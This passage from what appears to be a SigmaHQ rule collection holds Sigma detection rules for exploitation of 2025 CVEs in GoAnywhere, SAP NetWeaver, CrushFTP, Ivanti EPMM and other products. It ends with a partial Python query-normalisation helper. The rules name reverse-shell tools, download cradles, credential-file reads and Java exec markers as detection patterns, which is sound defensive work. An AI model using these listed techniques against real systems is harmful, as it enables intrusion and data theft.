    "content": "title: Potential Exploitation of GoAnywhere MFT Vulnerability\nid: 6c76b3d0-afe4-4870-9443-ffe6773c5fef\nstatus: experimental\ndescription: |\n    Detects suspicious command execution by child processes of the GoAnywhere Managed File Transfer (MFT) application, which may indicate exploitation such as CVE-2025-10035.\n    This behavior is indicative of post-exploitation activity related to CVE-2025-10035, as observed in campaigns by the threat actor Storm-1175.\nreferences:\n    - https://www.microsoft.com/en-us/security/blog/2025/10/06/investigating-active-exploitation-of-cve-2025-10035-goanywhere-managed-file-transfer-vulnerability/\nauthor: MSFT (idea), Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-10-07\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - attack.execution\n    - attack.t1059.001\n    - attack.persistence\n    - attack.t1133\n    - detection.emerging-threats\n    - cve.2025-10035\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    # Detects the GoAnywhere Tomcat parent process based on path and command line arguments\n    selection_parent:\n        ParentImage|contains: '\\GoAnywhere\\tomcat\\'\n    selection_powershell_img:\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\powershell_ise.exe'\n            - '\\pwsh.exe'\n    selection_powershell_cmd:\n        - CommandLine|contains|all:\n              - 'IEX'\n              - 'enc'\n              - 'Hidden'\n              - 'bypass'\n        - CommandLine|re:\n              - 'net\\s+user'\n              - 'net\\s+group'\n              - 'query\\s+session'\n        - CommandLine|contains:\n              - 'whoami'\n              - 'systeminfo'\n              - 'dsquery'\n              - 'localgroup administrators'\n              - 'nltest'\n              - 'samaccountname='\n              - 'adscredentials'\n              - 'o365accountconfiguration'\n              - '.DownloadString('\n              - '.DownloadFile('\n              - 'FromBase64String('\n              - 'System.IO.Compression'\n              - 'System.IO.MemoryStream'\n              - 'curl'\n    selection_child_cmd:\n        Image|endswith: '\\cmd.exe'\n        CommandLine|contains:\n            - 'powershell'\n            - 'whoami'\n            - 'net.exe'\n            - 'net1.exe'\n            - 'rundll32'\n            - 'quser'\n            - 'nltest'\n            - 'curl'\n    selection_child_others:\n        CommandLine|contains:\n            - 'bitsadmin'\n            - 'certutil'\n            - 'mshta'\n            - 'cscript'\n            - 'wscript'\n    condition: selection_parent and (all of selection_powershell_* or 1 of selection_child_*)\nfalsepositives:\n    - Legitimate administrative scripts or built-in GoAnywhere functions could potentially trigger this rule. Tuning may be required based on normal activity in your environment.\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2025/Exploits/CVE-2025-20333/proxy_exploit_cve_2025_20333.yml",
    "content": "title: Cisco ASA Exploitation Activity - Proxy\nid: 15697955-6a29-47ca-92e9-0e05efae3260\nstatus: experimental\ndescription: |\n    Detects suspicious requests to Cisco ASA WebVpn via proxy logs associated with CVE-2025-20333 and CVE-2025-20362 exploitation.\nreferences:\n    - https://x.com/defusedcyber/status/1971492272966598683\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-11-20\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2025-20333\n    - cve.2025-20362\n    - detection.emerging-threats\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        cs-method: 'GET'\n        cs-uri-stem:\n            - '/+CSCOU+/MacTunnelStart.jar'\n            - '/+CSCOL+/csvrloader64.cab'\n            - '/+CSCOL+/csvrloader.jar'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2025/Exploits/CVE-2025-24054/file_event_win_exploit_cve_2025_24054_library_ms.yml",
    "content": "title: Suspicious Creation of .library-ms File — Potential CVE-2025-24054 Exploit\nid: 5a7132c0-86db-4e6b-95c0-f0e9d7f461aa\nstatus: experimental\ndescription: |\n    Detects creation of '.library-ms' files, which may indicate exploitation of CVE-2025-24054. This vulnerability allows an attacker to trigger an automatic outbound SMB or WebDAV authentication request to a remote server upon archive extraction.\n    If the system is unpatched, no user interaction is required beyond extracting a malicious archive—potentially exposing the user's NTLMv2-SSP hash to the attacker.\nreferences:\n    - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24054\n    - https://research.checkpoint.com/2025/cve-2025-24054-ntlm-exploit-in-the-wild/\nauthor: Gene Kazimiarovich\ndate: 2025-04-20\ntags:\n    - detection.emerging-threats\n    - attack.credential-access\n    - attack.t1187   # Forced Authentication\n    - cve.2025-24054\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|endswith: '.library-ms'\n        Image|endswith:\n            - '\\7z.exe'\n            - '\\winrar.exe'\n            - '\\explorer.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate Library shortcuts under %APPDATA%\\Microsoft\\Windows\\Libraries\\ (rarely created by end-users)\n    - Custom corporate scripts that programmatically generate .library-ms Files\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2025/Exploits/CVE-2025-30406/proc_creation_win_exploit_cve_2025_30406_centrestack_portal_child_process.yml",
    "content": "title: Suspicious Process Spawned by CentreStack Portal AppPool\nid: 2d79e371-2a27-42de-87a4-b4213fc72a6a\nstatus: experimental\ndescription: |\n    Detects unexpected command shell execution (cmd.exe) from w3wp.exe when tied to CentreStack's portal.config, indicating potential exploitation (e.g., CVE-2025-30406).\nreferences:\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-30406\n    - https://blackpointcyber.com/blog/racing-to-exploit-centrestacks-cve-2025-30406/\n    - https://gladinetsupport.s3.us-east-1.amazonaws.com/gladinet/securityadvisory-cve-2005.pdf\n    - https://www.bleepingcomputer.com/news/security/centrestack-rce-exploited-as-zero-day-to-breach-file-sharing-servers/\nauthor: Jason Rathbun (Blackpoint Cyber)\ndate: 2025-04-17\ntags:\n    - attack.persistence\n    - attack.execution\n    - attack.t1059.003\n    - attack.t1505.003\n    - cve.2025-30406\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\w3wp.exe'\n        ParentCommandLine|contains: '\\portal\\portal.config'\n        Image|endswith: '\\cmd.exe'\n    condition: selection\nfalsepositives:\n    - Potentially if other portal services run on w3wp with an apppool\\portal\\portal.config; if you want to increase scope you could add the user IIS APPPOOL\\portal.\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2025/Exploits/CVE-2025-31161/proc_creation_win_crushftp_susp_child_processes.yml",
    "content": "title: Suspicious CrushFTP Child Process\nid: 459628e3-1b00-4e9b-9e5b-7da8961aea35\nstatus: experimental\ndescription: |\n    Detects suspicious child processes spawned by the CrushFTP service that may indicate exploitation of remote code execution vulnerabilities such as\n    CVE-2025-31161, where attackers can achieve RCE through crafted HTTP requests.\n    The detection focuses on commonly abused Windows executables (like powershell.exe, cmd.exe etc.) that attackers typically use post-exploitation to execute malicious commands.\nreferences:\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-2825\n    - https://www.crushftp.com/crush11wiki/Wiki.jsp?page=Update\n    - https://outpost24.com/blog/crushftp-auth-bypass-vulnerability/\n    - https://attackerkb.com/topics/k0EgiL9Psz/cve-2025-2825/rapid7-analysis\n    - https://projectdiscovery.io/blog/crushftp-authentication-bypass\nauthor: Craig Sweeney, Matt Anderson, Jose Oregon, Tim Kasper, Faith Stratton, Samantha Shaw, Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-04-10\ntags:\n    - attack.initial-access\n    - attack.execution\n    - attack.t1059.001\n    - attack.t1059.003\n    - attack.t1190\n    - cve.2025-31161\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith: '\\crushftpservice.exe'\n    selection_child:\n        Image|endswith:\n            - '\\bash.exe'\n            - '\\cmd.exe'\n            - '\\cscript.exe'\n            - '\\mshta.exe'\n            - '\\powershell.exe'\n            - '\\powershell_ise.exe'\n            - '\\pwsh.exe'\n            - '\\sh.exe'\n            - '\\wscript.exe'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate CrushFTP administrative actions\n    - Software updates\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2025/Exploits/CVE-2025-31324/file_event_lnx_sap_netweaver_webshell_creation.yml",
    "content": "title: Potential SAP NetWeaver Webshell Creation - Linux\nid: 5b91409c-cb18-4ab6-ac75-c5759f998409\nstatus: experimental\ndescription: |\n    Detects the creation of suspicious files (jsp, java, class) in SAP NetWeaver directories,\n    which may indicate exploitation attempts of vulnerabilities such as CVE-2025-31324.\nreferences:\n    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-31324\n    - https://reliaquest.com/blog/threat-spotlight-reliaquest-uncovers-vulnerability-behind-sap-netweaver-compromise/\n    - https://onapsis.com/blog/active-exploitation-of-sap-vulnerability-cve-2025-31324/\nauthor: Elastic (idea), Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-04-28\ntags:\n    - attack.execution\n    - attack.initial-access\n    - attack.t1190\n    - attack.persistence\n    - attack.t1059.003\n    - cve.2025-31324\n    - detection.emerging-threats\nlogsource:\n    product: linux\n    category: file_event\ndetection:\n    selection_path:\n        TargetFilename|contains:\n            - '/j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/work/'\n            - '/j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/root/'\n    selection_ext:\n        TargetFilename|endswith:\n            - '.jsp'\n            - '.java'\n            - '.class'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate creation of jsp or java files in these locations\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2025/Exploits/CVE-2025-31324/file_event_win_sap_netweaver_webshell_creation.yml",
    "content": "title: Potential SAP NetWeaver Webshell Creation\nid: 86a7c91f-98c3-4f14-a58d-d989421e1234\nstatus: experimental\ndescription: |\n    Detects the creation of suspicious files (jsp, java, class) in SAP NetWeaver directories,\n    which may indicate exploitation attempts of vulnerabilities such as CVE-2025-31324.\nreferences:\n    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-31324\n    - https://reliaquest.com/blog/threat-spotlight-reliaquest-uncovers-vulnerability-behind-sap-netweaver-compromise/\n    - https://onapsis.com/blog/active-exploitation-of-sap-vulnerability-cve-2025-31324/\nauthor: Elastic (idea), Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-04-28\ntags:\n    - attack.execution\n    - attack.initial-access\n    - attack.t1190\n    - attack.persistence\n    - attack.t1059.003\n    - cve.2025-31324\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection_path:\n        TargetFilename|contains:\n            - '\\j2ee\\cluster\\apps\\sap.com\\irj\\servlet_jsp\\irj\\work'\n            - '\\j2ee\\cluster\\apps\\sap.com\\irj\\servlet_jsp\\irj\\root'\n    selection_ext:\n        TargetFilename|endswith:\n            - '.jsp'\n            - '.java'\n            - '.class'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate creation of jsp, java or class files in these locations\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2025/Exploits/CVE-2025-31324/proc_creation_lnx_sap_netweaver_susp_child_process.yml",
    "content": "title: Suspicious Child Process of SAP NetWeaver - Linux\nid: 69dea60b-2deb-4c9e-a685-ad542f4367f9\nstatus: experimental\ndescription: |\n    Detects suspicious child processes spawned by SAP NetWeaver on Linux systems that could indicate potential\n    exploitation of a vulnerability that allows arbitrary code execution via webshells, such as CVE-2025-31324.\nauthor: Elastic (idea), Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-04-28\ntags:\n    - attack.execution\n    - attack.initial-access\n    - attack.t1190\n    - attack.persistence\n    - attack.t1059.003\n    - cve.2025-31324\n    - detection.emerging-threats\nreferences:\n    - https://reliaquest.com/blog/threat-spotlight-reliaquest-uncovers-vulnerability-behind-sap-netweaver-compromise/\n    - https://onapsis.com/blog/active-exploitation-of-sap-vulnerability-cve-2025-31324/\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection_parent_img:\n        ParentImage|contains:\n            - '/j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/work'\n            - '/j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/root'\n    selection_current_dict:\n        CurrentDirectory|contains:\n            - '/j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/work'\n            - '/j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/root'\n    selection_child:\n        Image|endswith:\n            - '/ash'\n            - '/bash'\n            - '/csh'\n            - '/dash'\n            - '/ksh'\n            - '/sh'\n            - '/tcsh'\n            - '/zsh'\n            - '/python'\n            - '/python2'\n            - '/python3'\n            - '/perl'\n            - '/ruby'\n            - '/curl'\n            - '/wget'\n            - '/nc'\n            - '/netcat'\n            - '/ncat'\n            - '/socat'\n            - '/nmap'\n            - '/telnet'\n            - '/awk'\n            - '/sed'\n    condition: (selection_parent_img or selection_current_dict) and selection_child\nfalsepositives:\n    - Legitimate administrative activities such as software updates\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2025/Exploits/CVE-2025-31324/proc_creation_win_sap_netweaver_susp_child_process.yml",
    "content": "title: Suspicious Child Process of SAP NetWeaver\nid: 5b304bcb-ac33-49d0-87af-fa1b3ca94333\nstatus: experimental\ndescription: |\n    Detects suspicious child processes spawned by SAP NetWeaver that could indicate potential\n    exploitation of a vulnerability that allows arbitrary code execution via webshells, such as CVE-2025-31324.\nauthor: Elastic (idea), Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-04-28\ntags:\n    - attack.execution\n    - attack.initial-access\n    - attack.t1190\n    - attack.persistence\n    - attack.t1059.003\n    - cve.2025-31324\n    - detection.emerging-threats\nreferences:\n    - https://reliaquest.com/blog/threat-spotlight-reliaquest-uncovers-vulnerability-behind-sap-netweaver-compromise/\n    - https://onapsis.com/blog/active-exploitation-of-sap-vulnerability-cve-2025-31324/\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent_img:\n        ParentImage|contains:\n            - '\\j2ee\\cluster\\apps\\sap.com\\irj\\servlet_jsp\\irj\\work'\n            - '\\j2ee\\cluster\\apps\\sap.com\\irj\\servlet_jsp\\irj\\root'\n    selection_current_dict:\n        CurrentDirectory|contains:\n            - '\\j2ee\\cluster\\apps\\sap.com\\irj\\servlet_jsp\\irj\\work'\n            - '\\j2ee\\cluster\\apps\\sap.com\\irj\\servlet_jsp\\irj\\root'\n    selection_child:\n        Image|endswith:\n            - '\\cmd.exe'\n            - '\\powershell.exe'\n            - '\\powershell_ise.exe'\n            - '\\pwsh.exe'\n            - '\\wscript.exe'\n            - '\\cscript.exe'\n            - '\\regsvr32.exe'\n            - '\\rundll32.exe'\n            - '\\mshta.exe'\n            - '\\certutil.exe'\n            - '\\bitsadmin.exe'\n            - '\\python.exe'\n    condition: (selection_parent_img or selection_current_dict) and selection_child\nfalsepositives:\n    - Legitimate administrative activities such as software updates\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2025/Exploits/CVE-2025-31324/web_lnx_exploit_cve_2025_31324_sap_netviewer_webshell.yml",
    "content": "title: Potential SAP NetWeaver Webshell Command Execution\nid: 94e12f41-6cb3-45c5-97b1-c783a7bf2e72\nstatus: experimental\ndescription: |\n    Detects potential command execution via a webshell in SAP NetWeaver through JSP files called with a cmd parameter.\n    This rule is created to detect exploitation of vulnerabilities like CVE-2025-31324, which allows remote code execution via a webshell.\nreferences:\n    - https://blog.eclecticiq.com/china-nexus-nation-state-actors-exploit-sap-netweaver-cve-2025-31324-to-target-critical-infrastructures\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-05-14\ntags:\n    - attack.persistence\n    - attack.t1505.003\n    - attack.initial-access\n    - attack.t1190\n    - detection.emerging-threats\n    - cve.2025-31324\nlogsource:\n    category: webserver\ndetection:\n    selection_uri:\n        cs-uri-stem|contains|all:\n            - '/irj/'\n            - '.jsp'\n    selection_query:\n        - cs-uri-query|startswith:\n              - 'cmd='\n              - 'command='\n              - 'exec_cmd='\n              - 'exec='\n        - cs-uri-query|contains:\n              - '/dev/tcp'\n              - '/etc/passwd'\n              - '%2fdev%2ftcp' # URL-encoded /dev/tcp\n              - '%2fetc%2fpasswd' # URL-encoded /etc/passwd\n              - '=uname'\n              - '=whoami'\n              - 'ifconfig'\n              - 'ping'\n              - 'pwd'\n        - cs-uri-query|contains|all:\n              - 'echo'\n              - 'base64'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate applications using a cmd parameter for non-malicious purposes\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2025/Exploits/CVE-2025-31324/web_lnx_exploit_cve_2025_31324_sap_netviewer_webshell_uploaded.yml",
    "content": "title: Potential Java WebShell Upload in SAP NetWeaver Server\nid: 639b893f-f93a-4e53-a7c8-f08cf73fe7f7\nstatus: experimental\ndescription: |\n    Detects potential Java webshell uploads via HTTP requests with Content-Type 'application/octet-stream' and Java file extensions.\n    This behavior might indicate exploitation of vulnerabilities like CVE-2025-31324, which allows remote code execution through webshells in SAP NetWeaver.\nreferences:\n    - https://blog.eclecticiq.com/china-nexus-nation-state-actors-exploit-sap-netweaver-cve-2025-31324-to-target-critical-infrastructures\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-05-14\ntags:\n    - attack.persistence\n    - attack.t1505.003\n    - detection.emerging-threats\n    - cve.2025-31324\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-content-type: 'application/octet-stream'\n        cs-method: 'POST'\n        cs-uri-stem|contains|all:\n            - '/irj/'\n            - '.jsp'\n        cs-uri-stem|endswith:\n            - '.class'\n            - '.java'\n            - '.jsp'\n    condition: selection\nfalsepositives:\n    - Legitimate uploads of Java files in development environments\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2025/Exploits/CVE-2025-32463/file_event_lnx_exploit_cve_2025_32463.yml",
    "content": "title: Non-Standard Nsswitch.Conf Creation - Potential CVE-2025-32463 Exploitation\nid: 10ac0730-c24e-4f4c-81f8-b13a1ac95a1d\nstatus: experimental\ndescription: |\n    Detects the creation of nsswitch.conf files in non-standard directories, which may indicate exploitation of CVE-2025-32463.\n    This vulnerability requires an attacker to create an nsswitch.conf in a directory that will be used during sudo chroot operations.\n    When sudo executes, it loads malicious shared libraries from user-controlled locations within the chroot environment,\n    potentially leading to arbitrary code execution and privilege escalation.\nreferences:\n    - https://github.com/kh4sh3i/CVE-2025-32463/blob/81bb430f84fa2089224733c3ed4bfa434c197ad4/exploit.sh\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-10-02\ntags:\n    - attack.privilege-escalation\n    - attack.t1068\n    - cve.2025-32463\n    - detection.emerging-threats\nlogsource:\n    category: file_event\n    product: linux\ndetection:\n    selection:\n        TargetFilename|endswith: '/etc/nsswitch.conf'\n    filter_main_legitimate_path:\n        TargetFilename: '/etc/nsswitch.conf'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Backup locations\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2025/Exploits/CVE-2025-33053/image_load_win_exploit_cve_2025_33053.yml",
    "content": "title: Potential Exploitation of RCE Vulnerability CVE-2025-33053 - Image Load\nid: 04fc4b22-91a6-495a-879d-0144fec5ec03\nrelated:\n    - id: abe06362-a5b9-4371-8724-ebd00cd48a04\n      type: similar\n    - id: 9a2d8b3e-f5a1-4c68-9e21-7d9e1cf8a123\n      type: similar\nstatus: experimental\ndescription: |\n    Detects potential exploitation of remote code execution vulnerability CVE-2025-33053\n    by monitoring suspicious image loads from WebDAV paths. The exploit involves malicious executables from\n    attacker-controlled WebDAV servers loading the Windows system DLLs like gdi32.dll, netapi32.dll, etc.\nreferences:\n    - https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-33053\n    - https://research.checkpoint.com/2025/stealth-falcon-zero-day/\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-06-13\ntags:\n    - attack.command-and-control\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1218\n    - attack.lateral-movement\n    - attack.t1105\n    - detection.emerging-threats\n    - cve.2025-33053\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection_img_path:\n        Image|startswith: '\\\\\\\\'\n        Image|contains: '\\DavWWWRoot\\'\n    selection_img_bin:\n        Image|endswith:\n            - '\\route.exe'\n            - '\\netsh.exe'\n            - '\\makecab.exe'\n            - '\\dxdiag.exe'\n            - '\\ipconfig.exe'\n            - '\\explorer.exe'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2025/Exploits/CVE-2025-33053/proc_access_win_exploit_cve_2025_33053.yml",
    "content": "title: Potential Exploitation of RCE Vulnerability CVE-2025-33053 - Process Access\nid: 9a2d8b3e-f5a1-4c68-9e21-7d9e1cf8a123\nrelated:\n    - id: abe06362-a5b9-4371-8724-ebd00cd48a04\n      type: similar\n    - id: 04fc4b22-91a6-495a-879d-0144fec5ec03\n      type: similar\nstatus: experimental\ndescription: |\n    Detects potential exploitation of remote code execution vulnerability CVE-2025-33053\n    by looking for process access that involves legitimate Windows executables (iediagcmd.exe, CustomShellHost.exe)\n    accessing suspicious executables hosted on WebDAV shares. This indicates an attacker may be exploiting\n    Process.Start() search order manipulation to execute malicious code from attacker-controlled WebDAV servers\n    instead of legitimate system binaries. The vulnerability allows unauthorized code execution through\n    external control of file names or paths via WebDAV.\nreferences:\n    - https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-33053\n    - https://research.checkpoint.com/2025/stealth-falcon-zero-day/\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-06-13\ntags:\n    - attack.command-and-control\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1218\n    - attack.lateral-movement\n    - attack.t1105\n    - detection.emerging-threats\n    - cve.2025-33053\nlogsource:\n    category: process_access\n    product: windows\ndetection:\n    selection_src:\n        SourceImage:\n            - 'C:\\Program Files\\internet explorer\\iediagcmd.exe'\n            - 'C:\\Windows\\System32\\CustomShellHost.exe'\n    selection_target_dir:\n        - TargetImage|startswith: '\\\\\\\\'\n        - TargetImage|contains: '\\DavWWWRoot\\'\n    selection_target_exe:\n        TargetImage|endswith:\n            - '\\route.exe'\n            - '\\netsh.exe'\n            - '\\makecab.exe'\n            - '\\dxdiag.exe'\n            - '\\ipconfig.exe'\n            - '\\explorer.exe'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2025/Exploits/CVE-2025-33053/proc_creation_win_exploit_cve_2025_33053.yml",
    "content": "title: Potential Exploitation of RCE Vulnerability CVE-2025-33053\nid: abe06362-a5b9-4371-8724-ebd00cd48a04\nrelated:\n    - id: 9a2d8b3e-f5a1-4c68-9e21-7d9e1cf8a123\n      type: similar\n    - id: 04fc4b22-91a6-495a-879d-0144fec5ec03\n      type: similar\nstatus: experimental\ndescription: |\n    Detects potential exploitation of remote code execution vulnerability CVE-2025-33053\n    which involves unauthorized code execution via WebDAV through external control of file names or paths.\n    The exploit abuses legitimate utilities like iediagcmd.exe or CustomShellHost.exe by manipulating\n    their working directories to point to attacker-controlled WebDAV servers, causing them to execute\n    malicious executables (like route.exe) from the WebDAV path instead of legitimate system binaries\n    through Process.Start() search order manipulation.\nreferences:\n    - https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-33053\n    - https://research.checkpoint.com/2025/stealth-falcon-zero-day/\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-06-13\ntags:\n    - attack.command-and-control\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1218\n    - attack.lateral-movement\n    - attack.t1105\n    - detection.emerging-threats\n    - cve.2025-33053\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage:\n            - 'C:\\Program Files\\internet explorer\\iediagcmd.exe'\n            - 'C:\\Windows\\System32\\CustomShellHost.exe'\n    selection_child_current_dir:\n        - CurrentDirectory|startswith: '\\\\\\\\'\n        - CurrentDirectory|contains: '\\DavWWWRoot\\'\n        - Image|contains: '\\DavWWWRoot\\'\n        - Image|startswith: '\\\\\\\\'\n    selection_child_img:\n        Image|endswith:\n            - '\\route.exe'\n            - '\\netsh.exe'\n            - '\\makecab.exe'\n            - '\\dxdiag.exe'\n            - '\\ipconfig.exe'\n            - '\\explorer.exe'\n    filter_main_system:\n        Image|startswith:\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2025/Exploits/CVE-2025-40551/proc_creation_win_exploit_cve_2025_40551.yml",
    "content": "title: Suspicious Child Process of SolarWinds WebHelpDesk\nid: 8c7f4a2d-3b9e-4f1c-9a6d-2e8f5c3d9a1b\nstatus: experimental\ndescription: |\n    Detects suspicious child processes spawned by the SolarWinds WebHelpDesk (WHD) application, which may indicate exploitation activity leveraging RCE vulnerabilities such as CVE-2025-40551, CVE-2025-40536, or CVE-2025-26399.\nreferences:\n    - https://www.microsoft.com/en-us/security/blog/2026/02/06/active-exploitation-solarwinds-web-help-desk/\n    - https://www.huntress.com/blog/active-exploitation-solarwinds-web-help-desk-cve-2025-26399\n    - https://documentation.solarwinds.com/en/success_center/whd/content/release_notes/whd_2026-1_release_notes.htm\nauthor: Huntress Team, Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2026-02-11\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2025-26399\n    - cve.2025-40536\n    - cve.2025-40551\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|contains: '\\WebHelpDesk\\bin\\'\n        ParentImage|endswith:\n            - '\\java.exe'\n            - '\\javaw.exe'\n        ParentCommandLine|contains: 'tomcat'\n    selection_suspicious_child:\n        CommandLine|contains:\n            - '-enc'\n            - 'base64'\n            - 'bitsadmin'\n            - 'certutil'\n            - 'curl'\n            - 'Invoke-RestMethod'\n            - 'Invoke-WebRequest'\n            - 'irm '\n            - 'iwr '\n            - 'mshta'\n            - 'msiexec'\n            - 'Net.WebClient'\n            - 'Start-BitsTransfer'\n            - 'wget'\n            - 'wmic'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2025/Exploits/CVE-2025-4427/web_invanti_epmm_cve_2025_4427_and_cve_2025_4428.yml",
    "content": "title: Potential Exploitation of CVE-2025-4427/4428 Ivanti EPMM Pre-Auth RCE\nid: 41956f7c-7a6b-46d6-b6bb-da6eb2e83fbe\nstatus: experimental\ndescription: |\n    Detects potential exploitation of a chained vulnerability attack targeting Ivanti EPMM 12.5.0.0.\n    CVE-2025-4427 allows unauthenticated access to protected API endpoints via an authentication bypass,\n    which can then be leveraged to trigger CVE-2025-4428, a remote code execution vulnerability through\n    template injection. This sequence enables unauthenticated remote code execution, significantly increasing\n    the impact of exploitation.\nreferences:\n    - https://labs.watchtowr.com/expression-payloads-meet-mayhem-cve-2025-4427-and-cve-2025-4428/?123\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-05-20\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - attack.execution\n    - attack.t1203\n    - cve.2025-4427\n    - cve.2025-4428\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection_uri:\n        cs-uri-stem|contains: '/mifs/rs/api/v2/featureusage'\n        cs-uri-query|contains: 'format='\n    selection_exploit_rce:\n        - cs-uri-query|contains|all:\n              - 'java.lang.Runtime'\n              - '.getMethod'\n              - 'getRuntime'\n              - '.exec('\n        - cs-uri-query|contains|all:\n              - 'java%2elang%2eRuntime' # java.lang.Runtime\n              - '%2egetMethod' # .getMethod\n              - '%2eexec%28' # .exec(\n        - cs-uri-query|contains:\n              - '%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65' # java.lang.Runtime (the earlier literal carried a trailing '%65%28%29', i.e. 'e()', which decoded to 'java.lang.Runtimee()' and could never match)\n              - '%67%65%74%52%75%6e%74%69%6d%65' # getRuntime\n              - '%2e%65%78%65%63%28' # .exec(\n    selection_exploit_template_injection:\n        cs-uri-query|contains:\n            - '{7*7}'\n            - '%7B7*7%7D'\n            - '%7b7%2a7%7d'\n    condition: selection_uri and 1 of selection_exploit_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
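The rule above enumerates plain, dot-encoded and fully percent-encoded spellings of the same Java reflection markers. An alternative, shown here as an added example that is not part of the SigmaHQ repository, is to percent-decode cs-uri-query (repeatedly, to catch double encoding) and match once on the decoded, lowercased text; the same normalisation applies to the SAP NetWeaver and SharePoint webserver rules in this directory. The events are constructed, and the query string carries only the marker substrings; it is not a working payload. Unlike the rule's hex-only alternative, which fires on any single marker, this version requires all four markers after decoding.

```python
# Added example, not code from the SigmaHQ rule set: normalise cs-uri-query before matching so
# that every encoding of the CVE-2025-4428 reflection markers collapses onto one check.
from urllib.parse import quote, unquote

FEATUREUSAGE_PATH = "/mifs/rs/api/v2/featureusage"
# Lowercase, because Sigma string matching is case-insensitive by default
RCE_MARKERS = ("java.lang.runtime", ".getmethod", "getruntime", ".exec(")
SSTI_PROBES = ("{7*7}",)


def decode_literal(s: str) -> str:
    """Percent-decode a string once. Useful for checking what an encoded rule literal really says."""
    return unquote(s)


def normalize_query(query: str, max_rounds: int = 3) -> str:
    """Percent-decode until the value stops changing (bounded), then lowercase."""
    cur = query
    for _ in range(max_rounds):
        nxt = unquote(cur)
        if nxt == cur:
            break
        cur = nxt
    return cur.lower()


def is_epmm_exploit_attempt(event: dict) -> bool:
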